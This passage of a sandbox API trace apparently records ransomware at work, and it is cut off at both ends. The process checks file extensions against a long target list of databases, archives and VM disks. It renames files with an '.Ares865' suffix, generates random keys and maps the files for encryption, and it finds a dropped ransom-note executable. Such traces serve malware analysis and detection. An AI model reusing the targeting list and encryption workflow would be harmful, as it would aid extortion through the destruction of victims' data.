lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0059.519] lstrlenW (lpString="trm") returned 3 [0059.519] lstrcmpiW (lpString1="-ms", lpString2="trm") returned -1 [0059.519] lstrlenW (lpString="udb") returned 3 [0059.519] lstrcmpiW (lpString1="-ms", lpString2="udb") returned -1 [0059.519] lstrlenW (lpString="udl") returned 3 [0059.519] lstrcmpiW (lpString1="-ms", lpString2="udl") returned -1 [0059.519] lstrlenW (lpString="usr") returned 3 [0059.519] lstrcmpiW (lpString1="-ms", lpString2="usr") returned -1 [0059.519] lstrlenW (lpString="v12") returned 3 [0059.519] lstrcmpiW (lpString1="-ms", lpString2="v12") returned -1 [0059.519] lstrlenW (lpString="vis") returned 3 [0059.519] lstrcmpiW (lpString1="-ms", lpString2="vis") returned -1 [0059.519] lstrlenW (lpString="vpd") returned 3 [0059.519] lstrcmpiW (lpString1="-ms", lpString2="vpd") returned -1 [0059.519] lstrlenW (lpString="vvv") returned 3 [0059.519] lstrcmpiW (lpString1="-ms", lpString2="vvv") returned -1 [0059.519] lstrlenW (lpString="wdb") returned 3 [0059.519] lstrcmpiW (lpString1="-ms", lpString2="wdb") returned -1 [0059.520] lstrlenW (lpString="wmdb") returned 4 [0059.520] lstrcmpiW (lpString1="h-ms", lpString2="wmdb") returned -1 [0059.520] lstrlenW (lpString="wrk") returned 3 [0059.520] lstrcmpiW (lpString1="-ms", lpString2="wrk") returned -1 [0059.520] lstrlenW (lpString="xdb") returned 3 [0059.520] lstrcmpiW (lpString1="-ms", lpString2="xdb") returned -1 [0059.520] lstrlenW (lpString="xld") returned 3 [0059.520] lstrcmpiW (lpString1="-ms", lpString2="xld") returned -1 [0059.520] lstrlenW (lpString="xmlff") returned 5 [0059.520] lstrcmpiW (lpString1="ch-ms", lpString2="xmlff") returned -1 [0059.520] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Searches\\Everywhere.search-ms.Ares865") returned 59 [0059.520] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default user\\searches\\everywhere.search-ms"), lpNewFileName="C:\\Users\\Default User\\Searches\\Everywhere.search-ms.Ares865" (normalized: "c:\\users\\default user\\searches\\everywhere.search-ms.ares865"), dwFlags=0x1) returned 1 [0059.520] CreateFileW (lpFileName="C:\\Users\\Default User\\Searches\\Everywhere.search-ms.Ares865" (normalized: "c:\\users\\default user\\searches\\everywhere.search-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0059.521] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=248) returned 1 [0059.521] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0059.521] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0059.521] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0738 [0059.521] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f06b0) returned 1 [0059.522] CryptGenRandom (in: hProv=0x2f06b0, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0059.522] CryptReleaseContext (hProv=0x2f06b0, dwFlags=0x0) returned 1 [0059.522] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x400, lpName=0x0) returned 0x120 [0059.536] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x400) returned 0x190000 [0059.544] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0628) returned 1 [0059.545] CryptGenRandom (in: hProv=0x2f0628, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0059.545] CryptReleaseContext (hProv=0x2f0628, dwFlags=0x0) returned 1 [0059.545] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0059.545] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0059.545] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0059.545] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0059.545] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0059.545] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0059.545] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0059.545] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0059.545] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0059.545] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0059.545] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0059.545] CloseHandle (hObject=0x120) returned 1 [0059.545] CloseHandle (hObject=0x118) returned 1 [0059.547] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0059.547] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0738 | out: hHeap=0x2b0000) returned 1 [0059.547] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0059.547] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e569e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49e569e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0059.547] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0059.547] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0059.547] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0059.547] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="aoldtz.exe") returned 1 [0059.547] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2=".") returned 1 [0059.547] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="..") returned 1 [0059.547] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="windows") returned -1 [0059.547] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="bootmgr") returned 1 [0059.547] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="temp") returned -1 [0059.547] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="pagefile.sys") returned -1 [0059.547] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="boot") returned 1 [0059.547] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="ids.txt") returned 1 [0059.547] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="ntuser.dat") returned -1 [0059.547] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="perflogs") returned -1 [0059.547] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="MSBuild") returned -1 [0059.547] lstrlenW (lpString="Indexed Locations.search-ms") returned 27 [0059.547] lstrlenW (lpString="C:\\Users\\Default User\\Searches\\Everywhere.search-ms") returned 51 [0059.548] lstrcpyW (in: lpString1=0x2cce43e, lpString2="Indexed Locations.search-ms" | out: lpString1="Indexed Locations.search-ms") returned="Indexed Locations.search-ms" [0059.548] lstrlenW (lpString="Indexed Locations.search-ms") returned 27 [0059.548] lstrlenW (lpString="Ares865") returned 7 [0059.548] lstrcmpiW (lpString1="arch-ms", lpString2="Ares865") returned -1 [0059.548] lstrlenW (lpString=".dll") returned 4 [0059.548] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2=".dll") returned 1 [0059.548] lstrlenW (lpString=".lnk") returned 4 [0059.548] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2=".lnk") returned 1 [0059.548] lstrlenW (lpString=".ini") returned 4 [0059.548] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2=".ini") returned 1 [0059.548] lstrlenW (lpString=".sys") returned 4 [0059.548] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2=".sys") returned 1 [0059.548] lstrlenW (lpString="Indexed Locations.search-ms") returned 27 [0059.548] lstrlenW (lpString="bak") returned 3 [0059.548] lstrcmpiW (lpString1="-ms", lpString2="bak") returned 1 [0059.548] lstrlenW (lpString="ba_") returned 3 [0059.548] lstrcmpiW (lpString1="-ms", lpString2="ba_") returned 1 [0059.548] lstrlenW (lpString="dbb") returned 3 [0059.548] lstrcmpiW (lpString1="-ms", lpString2="dbb") returned 1 [0059.548] lstrlenW (lpString="vmdk") returned 4 [0059.548] lstrcmpiW (lpString1="h-ms", lpString2="vmdk") returned -1 [0059.548] lstrlenW (lpString="rar") returned 3 [0059.548] lstrcmpiW (lpString1="-ms", lpString2="rar") returned -1 [0059.548] lstrlenW (lpString="zip") returned 3 [0059.548] lstrcmpiW (lpString1="-ms", lpString2="zip") returned -1 [0059.548] lstrlenW (lpString="tgz") returned 3 [0059.548] lstrcmpiW (lpString1="-ms", lpString2="tgz") returned -1 [0059.548] lstrlenW (lpString="vbox") returned 4 [0059.548] lstrcmpiW (lpString1="h-ms", lpString2="vbox") returned -1 [0059.548] lstrlenW (lpString="vdi") returned 3 [0059.548] lstrcmpiW (lpString1="-ms", lpString2="vdi") returned -1 [0059.548] lstrlenW (lpString="vhd") returned 3 [0059.548] lstrcmpiW (lpString1="-ms", lpString2="vhd") returned -1 [0059.548] lstrlenW (lpString="vhdx") returned 4 [0059.548] lstrcmpiW (lpString1="h-ms", lpString2="vhdx") returned -1 [0059.548] lstrlenW (lpString="avhd") returned 4 [0059.548] lstrcmpiW (lpString1="h-ms", lpString2="avhd") returned 1 [0059.549] lstrlenW (lpString="db") returned 2 [0059.549] lstrcmpiW (lpString1="ms", lpString2="db") returned 1 [0059.549] lstrlenW (lpString="db2") returned 3 [0059.549] lstrcmpiW (lpString1="-ms", lpString2="db2") returned 1 [0059.549] lstrlenW (lpString="db3") returned 3 [0059.549] lstrcmpiW (lpString1="-ms", lpString2="db3") returned 1 [0059.549] lstrlenW (lpString="dbf") returned 3 [0059.549] lstrcmpiW (lpString1="-ms", lpString2="dbf") returned 1 [0059.549] lstrlenW (lpString="mdf") returned 3 [0059.549] lstrcmpiW (lpString1="-ms", lpString2="mdf") returned 1 [0059.549] lstrlenW (lpString="mdb") returned 3 [0059.549] lstrcmpiW (lpString1="-ms", lpString2="mdb") returned 1 [0059.549] lstrlenW (lpString="sql") returned 3 [0059.549] lstrcmpiW (lpString1="-ms", lpString2="sql") returned -1 [0059.549] lstrlenW (lpString="sqlite") returned 6 [0059.549] lstrcmpiW (lpString1="rch-ms", lpString2="sqlite") returned -1 [0059.549] lstrlenW (lpString="sqlite3") returned 7 [0059.549] lstrcmpiW (lpString1="arch-ms", lpString2="sqlite3") returned -1 [0059.549] lstrlenW (lpString="sqlitedb") returned 8 [0059.549] lstrcmpiW (lpString1="earch-ms", lpString2="sqlitedb") returned -1 [0059.549] lstrlenW (lpString="xml") returned 3 [0059.549] lstrcmpiW (lpString1="-ms", lpString2="xml") returned -1 [0059.549] lstrlenW (lpString="$er") returned 3 [0059.549] lstrcmpiW (lpString1="-ms", lpString2="$er") returned 1 [0059.549] lstrlenW (lpString="4dd") returned 3 [0059.549] lstrcmpiW (lpString1="-ms", lpString2="4dd") returned 1 [0059.549] lstrlenW (lpString="4dl") returned 3 [0059.549] lstrcmpiW (lpString1="-ms", lpString2="4dl") returned 1 [0059.549] lstrlenW (lpString="^^^") returned 3 [0059.549] lstrcmpiW (lpString1="-ms", lpString2="^^^") returned 1 [0059.549] lstrlenW (lpString="abs") returned 3 [0059.549] lstrcmpiW (lpString1="-ms", lpString2="abs") returned 1 [0059.549] lstrlenW (lpString="abx") returned 3 [0059.549] lstrcmpiW (lpString1="-ms", lpString2="abx") returned 1 [0059.549] lstrlenW (lpString="accdb") returned 5 [0059.549] lstrcmpiW (lpString1="ch-ms", lpString2="accdb") returned 1 [0059.549] lstrlenW (lpString="accdc") returned 5 [0059.549] lstrcmpiW (lpString1="ch-ms", lpString2="accdc") returned 1 [0059.550] lstrlenW (lpString="accde") returned 5 [0059.550] lstrcmpiW (lpString1="ch-ms", lpString2="accde") returned 1 [0059.550] lstrlenW (lpString="accdr") returned 5 [0059.550] lstrcmpiW (lpString1="ch-ms", lpString2="accdr") returned 1 [0059.550] lstrlenW (lpString="accdt") returned 5 [0059.550] lstrcmpiW (lpString1="ch-ms", lpString2="accdt") returned 1 [0059.550] lstrlenW (lpString="accdw") returned 5 [0059.550] lstrcmpiW (lpString1="ch-ms", lpString2="accdw") returned 1 [0059.550] lstrlenW (lpString="accft") returned 5 [0059.550] lstrcmpiW (lpString1="ch-ms", lpString2="accft") returned 1 [0059.550] lstrlenW (lpString="adb") returned 3 [0059.550] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0059.550] lstrlenW (lpString="adb") returned 3 [0059.550] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0059.550] lstrlenW (lpString="ade") returned 3 [0059.550] lstrcmpiW (lpString1="-ms", lpString2="ade") returned 1 [0059.550] lstrlenW (lpString="adf") returned 3 [0059.550] lstrcmpiW (lpString1="-ms", lpString2="adf") returned 1 [0059.550] lstrlenW (lpString="adn") returned 3 [0059.550] lstrcmpiW (lpString1="-ms", lpString2="adn") returned 1 [0059.550] lstrlenW (lpString="adp") returned 3 [0059.550] lstrcmpiW (lpString1="-ms", lpString2="adp") returned 1 [0059.550] lstrlenW (lpString="alf") returned 3 [0059.550] lstrcmpiW (lpString1="-ms", lpString2="alf") returned 1 [0059.550] lstrlenW (lpString="ask") returned 3 [0059.550] lstrcmpiW (lpString1="-ms", lpString2="ask") returned 1 [0059.550] lstrlenW (lpString="btr") returned 3 [0059.550] lstrcmpiW (lpString1="-ms", lpString2="btr") returned 1 [0059.550] lstrlenW (lpString="cat") returned 3 [0059.550] lstrcmpiW (lpString1="-ms", lpString2="cat") returned 1 [0059.550] lstrlenW (lpString="cdb") returned 3 [0059.550] lstrcmpiW (lpString1="-ms", lpString2="cdb") returned 1 [0059.550] lstrlenW (lpString="ckp") returned 3 [0059.550] lstrcmpiW (lpString1="-ms", lpString2="ckp") returned 1 [0059.550] lstrlenW (lpString="cma") returned 3 [0059.550] lstrcmpiW (lpString1="-ms", lpString2="cma") returned 1 [0059.551] lstrlenW (lpString="cpd") returned 3 [0059.551] lstrcmpiW (lpString1="-ms", lpString2="cpd") returned 1 [0059.551] lstrlenW (lpString="dacpac") returned 6 [0059.551] lstrcmpiW (lpString1="rch-ms", lpString2="dacpac") returned 1 [0059.551] lstrlenW (lpString="dad") returned 3 [0059.551] lstrcmpiW (lpString1="-ms", lpString2="dad") returned 1 [0059.551] lstrlenW (lpString="dadiagrams") returned 10 [0059.551] lstrcmpiW (lpString1=".search-ms", lpString2="dadiagrams") returned -1 [0059.551] lstrlenW (lpString="daschema") returned 8 [0059.551] lstrcmpiW (lpString1="earch-ms", lpString2="daschema") returned 1 [0059.551] lstrlenW (lpString="db-journal") returned 10 [0059.551] lstrcmpiW (lpString1=".search-ms", lpString2="db-journal") returned -1 [0059.551] lstrlenW (lpString="db-shm") returned 6 [0059.551] lstrcmpiW (lpString1="rch-ms", lpString2="db-shm") returned 1 [0059.551] lstrlenW (lpString="db-wal") returned 6 [0059.551] lstrcmpiW (lpString1="rch-ms", lpString2="db-wal") returned 1 [0059.551] lstrlenW (lpString="dbc") returned 3 [0059.551] lstrcmpiW (lpString1="-ms", lpString2="dbc") returned 1 [0059.551] lstrlenW (lpString="dbs") returned 3 [0059.551] lstrcmpiW (lpString1="-ms", lpString2="dbs") returned 1 [0059.551] lstrlenW (lpString="dbt") returned 3 [0059.551] lstrcmpiW (lpString1="-ms", lpString2="dbt") returned 1 [0059.551] lstrlenW (lpString="dbv") returned 3 [0059.551] lstrcmpiW (lpString1="-ms", lpString2="dbv") returned 1 [0059.551] lstrlenW (lpString="dbx") returned 3 [0059.551] lstrcmpiW (lpString1="-ms", lpString2="dbx") returned 1 [0059.551] lstrlenW (lpString="dcb") returned 3 [0059.551] lstrcmpiW (lpString1="-ms", lpString2="dcb") returned 1 [0059.551] lstrlenW (lpString="dct") returned 3 [0059.551] lstrcmpiW (lpString1="-ms", lpString2="dct") returned 1 [0059.551] lstrlenW (lpString="dcx") returned 3 [0059.551] lstrcmpiW (lpString1="-ms", lpString2="dcx") returned 1 [0059.551] lstrlenW (lpString="ddl") returned 3 [0059.551] lstrcmpiW (lpString1="-ms", lpString2="ddl") returned 1 [0059.551] lstrlenW (lpString="dlis") returned 4 [0059.551] lstrcmpiW (lpString1="h-ms", lpString2="dlis") returned 1 [0059.551] lstrlenW (lpString="dp1") returned 3 [0059.552] lstrcmpiW (lpString1="-ms", lpString2="dp1") returned 1 [0059.552] lstrlenW (lpString="dqy") returned 3 [0059.552] lstrcmpiW (lpString1="-ms", lpString2="dqy") returned 1 [0059.552] lstrlenW (lpString="dsk") returned 3 [0059.552] lstrcmpiW (lpString1="-ms", lpString2="dsk") returned 1 [0059.552] lstrlenW (lpString="dsn") returned 3 [0059.552] lstrcmpiW (lpString1="-ms", lpString2="dsn") returned 1 [0059.552] lstrlenW (lpString="dtsx") returned 4 [0059.552] lstrcmpiW (lpString1="h-ms", lpString2="dtsx") returned 1 [0059.552] lstrlenW (lpString="dxl") returned 3 [0059.552] lstrcmpiW (lpString1="-ms", lpString2="dxl") returned 1 [0059.552] lstrlenW (lpString="eco") returned 3 [0059.552] lstrcmpiW (lpString1="-ms", lpString2="eco") returned 1 [0059.552] lstrlenW (lpString="ecx") returned 3 [0059.552] lstrcmpiW (lpString1="-ms", lpString2="ecx") returned 1 [0059.552] lstrlenW (lpString="edb") returned 3 [0059.552] lstrcmpiW (lpString1="-ms", lpString2="edb") returned 1 [0059.552] lstrlenW (lpString="epim") returned 4 [0059.552] lstrcmpiW (lpString1="h-ms", lpString2="epim") returned 1 [0059.552] lstrlenW (lpString="fcd") returned 3 [0059.552] lstrcmpiW (lpString1="-ms", lpString2="fcd") returned 1 [0059.552] lstrlenW (lpString="fdb") returned 3 [0059.552] lstrcmpiW (lpString1="-ms", lpString2="fdb") returned 1 [0059.552] lstrlenW (lpString="fic") returned 3 [0059.552] lstrcmpiW (lpString1="-ms", lpString2="fic") returned 1 [0059.552] lstrlenW (lpString="flexolibrary") returned 12 [0059.552] lstrcmpiW (lpString1="ns.search-ms", lpString2="flexolibrary") returned 1 [0059.552] lstrlenW (lpString="fm5") returned 3 [0059.552] lstrcmpiW (lpString1="-ms", lpString2="fm5") returned 1 [0059.552] lstrlenW (lpString="fmp") returned 3 [0059.552] lstrcmpiW (lpString1="-ms", lpString2="fmp") returned 1 [0059.552] lstrlenW (lpString="fmp12") returned 5 [0059.552] lstrcmpiW (lpString1="ch-ms", lpString2="fmp12") returned -1 [0059.552] lstrlenW (lpString="fmpsl") returned 5 [0059.552] lstrcmpiW (lpString1="ch-ms", lpString2="fmpsl") returned -1 [0059.552] lstrlenW (lpString="fol") returned 3 [0059.552] lstrcmpiW (lpString1="-ms", lpString2="fol") returned 1 [0059.552] lstrlenW (lpString="fp3") returned 3 [0059.552] lstrcmpiW (lpString1="-ms", lpString2="fp3") returned 1 [0059.553] lstrlenW (lpString="fp4") returned 3 [0059.553] lstrcmpiW (lpString1="-ms", lpString2="fp4") returned 1 [0059.553] lstrlenW (lpString="fp5") returned 3 [0059.553] lstrcmpiW (lpString1="-ms", lpString2="fp5") returned 1 [0059.553] lstrlenW (lpString="fp7") returned 3 [0059.553] lstrcmpiW (lpString1="-ms", lpString2="fp7") returned 1 [0059.553] lstrlenW (lpString="fpt") returned 3 [0059.553] lstrcmpiW (lpString1="-ms", lpString2="fpt") returned 1 [0059.553] lstrlenW (lpString="frm") returned 3 [0059.553] lstrcmpiW (lpString1="-ms", lpString2="frm") returned 1 [0059.553] lstrlenW (lpString="gdb") returned 3 [0059.553] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0059.553] lstrlenW (lpString="gdb") returned 3 [0059.553] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0059.553] lstrlenW (lpString="grdb") returned 4 [0059.553] lstrcmpiW (lpString1="h-ms", lpString2="grdb") returned 1 [0059.553] lstrlenW (lpString="gwi") returned 3 [0059.553] lstrcmpiW (lpString1="-ms", lpString2="gwi") returned 1 [0059.553] lstrlenW (lpString="hdb") returned 3 [0059.553] lstrcmpiW (lpString1="-ms", lpString2="hdb") returned 1 [0059.553] lstrlenW (lpString="his") returned 3 [0059.553] lstrcmpiW (lpString1="-ms", lpString2="his") returned 1 [0059.553] lstrlenW (lpString="ib") returned 2 [0059.553] lstrcmpiW (lpString1="ms", lpString2="ib") returned 1 [0059.553] lstrlenW (lpString="idb") returned 3 [0059.553] lstrcmpiW (lpString1="-ms", lpString2="idb") returned 1 [0059.553] lstrlenW (lpString="ihx") returned 3 [0059.553] lstrcmpiW (lpString1="-ms", lpString2="ihx") returned 1 [0059.553] lstrlenW (lpString="itdb") returned 4 [0059.553] lstrcmpiW (lpString1="h-ms", lpString2="itdb") returned -1 [0059.553] lstrlenW (lpString="itw") returned 3 [0059.553] lstrcmpiW (lpString1="-ms", lpString2="itw") returned 1 [0059.553] lstrlenW (lpString="jet") returned 3 [0059.553] lstrcmpiW (lpString1="-ms", lpString2="jet") returned 1 [0059.553] lstrlenW (lpString="jtx") returned 3 [0059.553] lstrcmpiW (lpString1="-ms", lpString2="jtx") returned 1 [0059.553] lstrlenW (lpString="kdb") returned 3 [0059.553] lstrcmpiW (lpString1="-ms", lpString2="kdb") returned 1 [0059.554] lstrlenW (lpString="kexi") returned 4 [0059.554] lstrcmpiW (lpString1="h-ms", lpString2="kexi") returned -1 [0059.554] lstrlenW (lpString="kexic") returned 5 [0059.554] lstrcmpiW (lpString1="ch-ms", lpString2="kexic") returned -1 [0059.554] lstrlenW (lpString="kexis") returned 5 [0059.554] lstrcmpiW (lpString1="ch-ms", lpString2="kexis") returned -1 [0059.554] lstrlenW (lpString="lgc") returned 3 [0059.554] lstrcmpiW (lpString1="-ms", lpString2="lgc") returned 1 [0059.554] lstrlenW (lpString="lwx") returned 3 [0059.554] lstrcmpiW (lpString1="-ms", lpString2="lwx") returned 1 [0059.554] lstrlenW (lpString="maf") returned 3 [0059.554] lstrcmpiW (lpString1="-ms", lpString2="maf") returned 1 [0059.554] lstrlenW (lpString="maq") returned 3 [0059.554] lstrcmpiW (lpString1="-ms", lpString2="maq") returned 1 [0059.554] lstrlenW (lpString="mar") returned 3 [0059.554] lstrcmpiW (lpString1="-ms", lpString2="mar") returned 1 [0059.554] lstrlenW (lpString="marshal") returned 7 [0059.554] lstrcmpiW (lpString1="arch-ms", lpString2="marshal") returned -1 [0059.554] lstrlenW (lpString="mas") returned 3 [0059.554] lstrcmpiW (lpString1="-ms", lpString2="mas") returned 1 [0059.554] lstrlenW (lpString="mav") returned 3 [0059.554] lstrcmpiW (lpString1="-ms", lpString2="mav") returned 1 [0059.554] lstrlenW (lpString="maw") returned 3 [0059.554] lstrcmpiW (lpString1="-ms", lpString2="maw") returned 1 [0059.554] lstrlenW (lpString="mdbhtml") returned 7 [0059.554] lstrcmpiW (lpString1="arch-ms", lpString2="mdbhtml") returned -1 [0059.554] lstrlenW (lpString="mdn") returned 3 [0059.554] lstrcmpiW (lpString1="-ms", lpString2="mdn") returned 1 [0059.554] lstrlenW (lpString="mdt") returned 3 [0059.554] lstrcmpiW (lpString1="-ms", lpString2="mdt") returned 1 [0059.554] lstrlenW (lpString="mfd") returned 3 [0059.554] lstrcmpiW (lpString1="-ms", lpString2="mfd") returned 1 [0059.554] lstrlenW (lpString="mpd") returned 3 [0059.554] lstrcmpiW (lpString1="-ms", lpString2="mpd") returned 1 [0059.554] lstrlenW (lpString="mrg") returned 3 [0059.554] lstrcmpiW (lpString1="-ms", lpString2="mrg") returned 1 [0059.554] lstrlenW (lpString="mud") returned 3 [0059.555] lstrcmpiW (lpString1="-ms", lpString2="mud") returned -1 [0059.555] lstrlenW (lpString="mwb") returned 3 [0059.555] lstrcmpiW (lpString1="-ms", lpString2="mwb") returned -1 [0059.555] lstrlenW (lpString="myd") returned 3 [0059.555] lstrcmpiW (lpString1="-ms", lpString2="myd") returned -1 [0059.555] lstrlenW (lpString="ndf") returned 3 [0059.555] lstrcmpiW (lpString1="-ms", lpString2="ndf") returned -1 [0059.555] lstrlenW (lpString="nnt") returned 3 [0059.555] lstrcmpiW (lpString1="-ms", lpString2="nnt") returned -1 [0059.555] lstrlenW (lpString="nrmlib") returned 6 [0059.555] lstrcmpiW (lpString1="rch-ms", lpString2="nrmlib") returned 1 [0059.555] lstrlenW (lpString="ns2") returned 3 [0059.555] lstrcmpiW (lpString1="-ms", lpString2="ns2") returned -1 [0059.555] lstrlenW (lpString="ns3") returned 3 [0059.555] lstrcmpiW (lpString1="-ms", lpString2="ns3") returned -1 [0059.555] lstrlenW (lpString="ns4") returned 3 [0059.555] lstrcmpiW (lpString1="-ms", lpString2="ns4") returned -1 [0059.555] lstrlenW (lpString="nsf") returned 3 [0059.555] lstrcmpiW (lpString1="-ms", lpString2="nsf") returned -1 [0059.555] lstrlenW (lpString="nv") returned 2 [0059.555] lstrcmpiW (lpString1="ms", lpString2="nv") returned -1 [0059.555] lstrlenW (lpString="nv2") returned 3 [0059.555] lstrcmpiW (lpString1="-ms", lpString2="nv2") returned -1 [0059.555] lstrlenW (lpString="nwdb") returned 4 [0059.555] lstrcmpiW (lpString1="h-ms", lpString2="nwdb") returned -1 [0059.555] lstrlenW (lpString="nyf") returned 3 [0059.555] lstrcmpiW (lpString1="-ms", lpString2="nyf") returned -1 [0059.555] lstrlenW (lpString="odb") returned 3 [0059.555] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0059.555] lstrlenW (lpString="odb") returned 3 [0059.555] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0059.555] lstrlenW (lpString="oqy") returned 3 [0059.555] lstrcmpiW (lpString1="-ms", lpString2="oqy") returned -1 [0059.555] lstrlenW (lpString="ora") returned 3 [0059.555] lstrcmpiW (lpString1="-ms", lpString2="ora") returned -1 [0059.555] lstrlenW (lpString="orx") returned 3 [0059.555] lstrcmpiW (lpString1="-ms", lpString2="orx") returned -1 [0059.556] lstrlenW (lpString="owc") returned 3 [0059.556] lstrcmpiW (lpString1="-ms", lpString2="owc") returned -1 [0059.556] lstrlenW (lpString="p96") returned 3 [0059.556] lstrcmpiW (lpString1="-ms", lpString2="p96") returned -1 [0059.556] lstrlenW (lpString="p97") returned 3 [0059.556] lstrcmpiW (lpString1="-ms", lpString2="p97") returned -1 [0059.556] lstrlenW (lpString="pan") returned 3 [0059.556] lstrcmpiW (lpString1="-ms", lpString2="pan") returned -1 [0059.556] lstrlenW (lpString="pdb") returned 3 [0059.556] lstrcmpiW (lpString1="-ms", lpString2="pdb") returned -1 [0059.556] lstrlenW (lpString="pdm") returned 3 [0059.556] lstrcmpiW (lpString1="-ms", lpString2="pdm") returned -1 [0059.556] lstrlenW (lpString="pnz") returned 3 [0059.556] lstrcmpiW (lpString1="-ms", lpString2="pnz") returned -1 [0059.556] lstrlenW (lpString="qry") returned 3 [0059.556] lstrcmpiW (lpString1="-ms", lpString2="qry") returned -1 [0059.556] lstrlenW (lpString="qvd") returned 3 [0059.556] lstrcmpiW (lpString1="-ms", lpString2="qvd") returned -1 [0059.556] lstrlenW (lpString="rbf") returned 3 [0059.556] lstrcmpiW (lpString1="-ms", lpString2="rbf") returned -1 [0059.556] lstrlenW (lpString="rctd") returned 4 [0059.556] lstrcmpiW (lpString1="h-ms", lpString2="rctd") 